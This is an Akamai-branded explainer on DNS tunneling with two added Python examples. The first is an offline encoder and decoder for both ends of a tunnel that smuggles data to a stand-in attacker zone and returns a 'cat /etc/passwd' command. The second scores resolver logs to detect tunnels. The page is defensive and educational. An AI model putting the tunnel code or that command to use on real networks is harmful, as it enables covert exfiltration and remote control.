While DNS tunneling can have legitimate uses, it is often exploited for malicious purposes, making detection and prevention crucial.
DNS tunneling is a type of cyberattack in which attackers use the Domain Name System (DNS) as a transport for traffic that is not DNS at all. By encoding that traffic inside ordinary-looking DNS queries and responses, attackers can often slip past network security controls that allow DNS through unchecked. A successful DNS tunneling attack lets the attacker exfiltrate data, send commands to compromised machines, collect user credentials, or map a network's footprint in preparation for future attacks.
What are DNS queries and DNS traffic?
DNS is the internet's address book. DNS servers translate the human-readable names that users type into a web browser into machine-readable IP addresses (a numeric address such as 192.0.2.10 or 2001:db8:3e8:2a3::b63) that allow the browser to connect to the correct site. DNS lets people navigate the web using easy-to-remember domain names rather than keeping track of the IP address of every site they want to visit.
Several things make DNS an attractive attack vector. Nearly every application and service relies on DNS, so DNS traffic is permitted almost everywhere and widely trusted. The protocol was designed to resolve names quickly and accurately, not securely: a resolver answers any well-formed query without authenticating the client or questioning its purpose. Beyond names and addresses, DNS records (TXT records, for example) can carry small pieces of arbitrary data, so queries and responses can move information between devices, servers, or systems. Because many organizations do not inspect these packets for malicious content, DNS tunneling can be a highly effective DNS attack vector.
How does DNS tunneling work?
A DNS tunneling attack begins when malware reaches a computer, either because a user downloads it or because an attacker exploits a vulnerability in the system and installs a malicious payload. Typically, attackers want to retain control of the device so they can run commands on it or move data out of the environment. To do this they need a tunnel: a way of sending commands to and receiving data from the compromised system while avoiding detection by the network's perimeter security.
DNS traffic is well suited to this because firewalls almost always allow it outbound, and the organization's own recursive resolver will relay a query to any authoritative nameserver on the internet on a client's behalf. To create the tunnel, the attacker registers a domain name and configures an authoritative nameserver under their control for it. The malware on the victim's device encodes data, or a request for new commands, into the subdomain labels of a query for a name such as <encoded-data>.attacker-domain.example. The internal resolver finds no cached answer for that unique name and forwards the query to the attacker's nameserver, which decodes the labels and replies with a DNS response whose records (TXT, for example) carry encoded commands or data back to the compromised device. In this way the attacker can communicate continuously with the victim, often without the victim ever connecting directly to the attacker's server and without setting off any alarms.
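The exchange described above, as an added example that is not part of the original page or of any real tunneling tool: it shows both ends of a tunnel offline, the malware side splitting a payload into query names that respect the DNS label and name limits, and the attacker's nameserver side reassembling them and answering with a command packed into TXT strings. The zone name t.attacker-domain.example and the chunk size are assumptions for illustration; no network code is involved.

```python
from __future__ import annotations

import base64

# Constructed example zone; .example is reserved for documentation. The name is
# an assumption for illustration, not a real attacker-controlled domain.
TUNNEL_ZONE = "t.attacker-domain.example"

MAX_LABEL = 63        # RFC 1035: one label is at most 63 octets
MAX_NAME = 253        # RFC 1035: 255 octets on the wire, 253 characters in text form
MAX_TXT_STRING = 255  # RFC 1035: each <character-string> in TXT RDATA is at most 255 octets


def _b32(data: bytes) -> str:
    # base32 survives DNS case-folding and 0x20 case randomisation by resolvers;
    # padding is dropped because '=' is not a valid hostname character.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_upstream(payload: bytes, zone: str = TUNNEL_ZONE, chunk_bytes: int = 60) -> list[str]:
    """Client (malware) side: split payload into query names under the attacker's zone.

    Each name is <seq>-<total>.<base32 data split into 63-char labels>.<zone>.
    The sequence label makes every name unique, so the organisation's recursive
    resolver cannot serve a cached answer and must forward each query upstream.
    """
    chunks = [payload[i:i + chunk_bytes] for i in range(0, len(payload), chunk_bytes)]
    names = []
    for seq, chunk in enumerate(chunks):
        b32 = _b32(chunk)
        data_labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([f"{seq}-{len(chunks)}", *data_labels, zone])
        if len(name) > MAX_NAME:
            raise ValueError(f"query name too long ({len(name)} > {MAX_NAME}); use a smaller chunk")
        names.append(name)
    return names


def decode_upstream(names: list[str], zone: str = TUNNEL_ZONE) -> bytes:
    """Authoritative-server side: reassemble the payload from the query names received."""
    suffix = "." + zone.lower()
    pieces, total = {}, None
    for name in names:
        name = name.lower()          # resolvers may randomise case (0x20 encoding)
        if not name.endswith(suffix):
            continue                 # a query for some other name; not part of the tunnel
        labels = name[: -len(suffix)].split(".")
        seq, total = (int(x) for x in labels[0].split("-"))
        pieces[seq] = _unb32("".join(labels[1:]))
    if total is None or len(pieces) != total:
        raise ValueError("transfer incomplete: missing chunks")
    return b"".join(pieces[i] for i in range(total))


def encode_downstream(command: bytes) -> list[str]:
    """Server side: pack a command into the strings of a TXT answer."""
    b64 = base64.b64encode(command).decode("ascii")
    return [b64[i:i + MAX_TXT_STRING] for i in range(0, len(b64), MAX_TXT_STRING)]


def decode_downstream(txt_strings: list[str]) -> bytes:
    """Client side: recover the command from the TXT strings."""
    return base64.b64decode("".join(txt_strings))


def roundtrip(payload: bytes, command: bytes) -> tuple[bytes, bytes, int]:
    """Run both directions offline: (payload seen by server, command seen by client, queries used)."""
    queries = encode_upstream(payload)
    received = decode_upstream(queries)
    answer = encode_downstream(command)
    return received, decode_downstream(answer), len(queries)


if __name__ == "__main__":
    got, cmd, n = roundtrip(b"user=alice;host=ws-042;os=linux;" * 4, b"run: cat /etc/passwd")
    print(n, "queries;", got[:32], cmd)
```

Two details matter for a defender. First, every upstream name is unique, which is why tunnels show up in resolver logs as a flood of never-repeated subdomains under one domain. Second, the victim only ever talks to its normal resolver; the attacker's nameserver sees the organization's resolver address, not the infected host, so blocking direct outbound connections does nothing against this channel.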
How do hackers use DNS tunneling?
DNS tunneling enables attackers to perform a variety of malicious activities.
- Installing malware. Attackers may use DNS tunneling to install malware on additional systems.
- Collecting credentials. Once they have command and control of a device, attackers can use keyloggers and other methods to collect user credentials that can be used to mount additional attacks or be sold on the dark web.
- Exploring the network. DNS lookups made from inside an infected network, such as reverse lookups of internal address ranges, can help attackers build a map of the network, identifying systems and high-value assets.
- Exfiltrating data. Cybercriminals may use DNS tunneling to transfer data out of the network, including sensitive or confidential user information.
- Controlling devices. With the ability to control an infected device, attackers can trigger other threats such as DDoS attacks.
Why are DNS tunneling attacks effective?
Many businesses don't monitor their DNS traffic for malicious activity. DNS is allowed through nearly every firewall, queries are relayed by the organization's own resolvers rather than by the infected host, and a tunnel can be throttled to a trickle that blends in with ordinary name resolution. Unless someone is specifically looking at DNS for the indicators below, a tunnel rarely stands out.
How can DNS tunneling be detected?
Security teams can analyze payloads and traffic for signs of a DNS tunneling attack.
Payload analysis looks at the contents of DNS requests and responses. For example, unusually long or random-looking hostnames, or a large difference between the size of a DNS request and its response, may be signs of suspicious activity. Payload analysis may also look for unusual character sets, strange information being sent via DNS, record types that ordinary clients seldom query (such as TXT or NULL), or recurring patterns in the queries from the source IP addresses sending the most traffic.
Traffic analysis looks at the volume and shape of DNS traffic: the number of requests made, where they originate, how many unique subdomains are queried under a single domain, the age and reputation of those domains, and other anomalous DNS behavior. IT teams may also analyze packet sizes, since DNS tunneling typically produces larger queries and responses than ordinary name resolution.
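The payload and traffic signals described above, run over a constructed sample of resolver query logs as an added example (not code or data from the original page). The log lines are made up for illustration; the log format (client, query type, query name, response size) and the scoring thresholds are assumptions, and the registered-domain extraction takes the last two labels as a simplification where production code would consult the public suffix list.

```python
import math
from collections import defaultdict

# Constructed sample of resolver query logs for illustration (not captured data).
# Fields: client address, query type, query name, response size in bytes.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com 45
10.0.0.5 AAAA www.example.com 57
10.0.0.7 A mail.example.net 45
10.0.0.5 A cdn.static-site.example 60
10.0.0.9 A www.example.com 45
10.0.0.9 MX example.net 80
10.0.0.9 A www.example.com 45
10.0.0.7 A www.example.com 45
10.0.0.12 TXT 0-4.nbswy3dpeb3w64tmmqqhg2lhnzsxi5dj.t.attacker-domain.example 310
10.0.0.12 TXT 1-4.gezdgnbvgy3tqojqgezdgnbvgy3tqojqkrsxg5c.t.attacker-domain.example 298
10.0.0.12 TXT 2-4.mfrggzdfmztwqzlkmfrggzdfmztwqzlkmfrggzdf.t.attacker-domain.example 305
10.0.0.12 TXT 3-4.krugkidrovuwg2zamjzg653oebtg66banj2w24dtmvxdozi.t.attacker-domain.example 290
10.0.0.12 TXT p-8f3a1c.t.attacker-domain.example 260
"""

RARE_QTYPES = {"TXT", "NULL"}   # record types that ordinary clients seldom query


def shannon_entropy(text: str) -> float:
    """Bits per character: base32/base64 data scores high, real hostnames low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Assumption for the example: the registered domain is the last two labels.
    # Production code should use the public suffix list (co.uk and the like).
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def parse_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, qtype, qname, size = line.split()
        records.append((client, qtype, qname.lower(), int(size)))
    return records


def analyze(log_text: str, min_queries: int = 5) -> dict:
    """Score each registered domain on the payload and traffic signals; one point per signal."""
    by_domain = defaultdict(list)
    for rec in parse_log(log_text):
        by_domain[registered_domain(rec[2])].append(rec)

    results = {}
    for domain, recs in by_domain.items():
        # The part of each name below the registered domain ("" when the apex itself is queried).
        subdomains = [r[2][: -len(domain) - 1] if r[2] != domain else "" for r in recs]
        stats = {
            "queries": len(recs),
            "unique_subdomain_ratio": len(set(subdomains)) / len(recs),
            "avg_name_len": sum(len(r[2]) for r in recs) / len(recs),
            "avg_subdomain_entropy": sum(shannon_entropy(s) for s in subdomains) / len(recs),
            "rare_qtype_ratio": sum(r[1] in RARE_QTYPES for r in recs) / len(recs),
            "avg_response_bytes": sum(r[3] for r in recs) / len(recs),
        }
        score = 0
        if stats["queries"] >= min_queries:        # too few queries to judge otherwise
            score += stats["unique_subdomain_ratio"] >= 0.8   # names never repeat
            score += stats["avg_name_len"] > 50                # long names carry data
            score += stats["avg_subdomain_entropy"] > 3.0      # encoded, not human-chosen
            score += stats["rare_qtype_ratio"] > 0.5           # TXT/NULL used as a downlink
            score += stats["avg_response_bytes"] > 200         # fat answers for tiny questions
        stats["score"] = int(score)
        results[domain] = stats
    return results


def flag_tunnels(log_text: str, threshold: int = 3) -> list:
    """Domains scoring at or above the threshold, sorted for stable output."""
    return sorted(d for d, s in analyze(log_text).items() if s["score"] >= threshold)


if __name__ == "__main__":
    for domain, stats in analyze(SAMPLE_LOG).items():
        print(f"{domain:28} score={stats['score']} {stats}")
    print("flagged:", flag_tunnels(SAMPLE_LOG))
```

Treat the score as a triage signal, not a verdict. Content delivery networks, some antivirus products that look up signatures over TXT queries, and other sanctioned uses of DNS as a data channel will trip the same heuristics, so build a baseline of normal domains and allowlist the known ones before alerting. Note also that these logs come from the organization's own resolver; a host that sends its queries elsewhere (for example over DNS over HTTPS to a public resolver) will not appear in them at all.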
How can DNS tunneling attacks be prevented?
To prevent DNS tunneling attacks, IT and security teams may follow several cybersecurity best practices.
- Conduct security awareness training to help employees avoid clicking on malicious links, opening suspicious emails and attachments, or taking other actions that could trigger malware.
- Implement advanced antivirus and anti-malware technology to help avoid malware installation, which is often the first step in establishing a DNS tunnel.
- Deploy technology to perform a deep scan of all network traffic — including DNS requests — to uncover DNS tunneling attacks.
- Inventory the legitimate uses of DNS as a data channel in your environment, such as antivirus products and other security tools that fetch signature information over DNS queries, so that their traffic can be recognized and a channel that is being abused for other purposes can be spotted.
- Deploy DNS firewalls or DNS tunneling detection tools that monitor resolver traffic for suspicious behavior.
- Adopt advanced threat protection solutions to improve DNS security, block malware, stop data exfiltration, and uncover malicious content embedded within DNS traffic.
Frequently Asked Questions (FAQ)
What is DNS tunneling?
DNS tunneling is a technique that involves encapsulating non-DNS traffic within DNS packets, often used for covert data transmission.
How can DNS tunneling be detected?
Detection methods include traffic analysis, anomaly detection, and the use of specialized tools designed to identify abnormal DNS patterns.
Can DNS tunneling be used legitimately?
Yes, DNS tunneling can be employed for legal purposes, such as bypassing network restrictions for authorized activities.
How can organizations protect against DNS tunneling?
Implementing robust network security measures, employing DNS monitoring tools, and staying informed about evolving threats are essential for protection.
Why customers choose Akamai
Akamai powers and protects life online. Leading companies worldwide choose Akamai to build, deliver, and secure their digital experiences — helping billions of people live, work, and play every day. Akamai Connected Cloud, a massively distributed edge and cloud platform, puts apps and experiences closer to users and keeps threats farther away.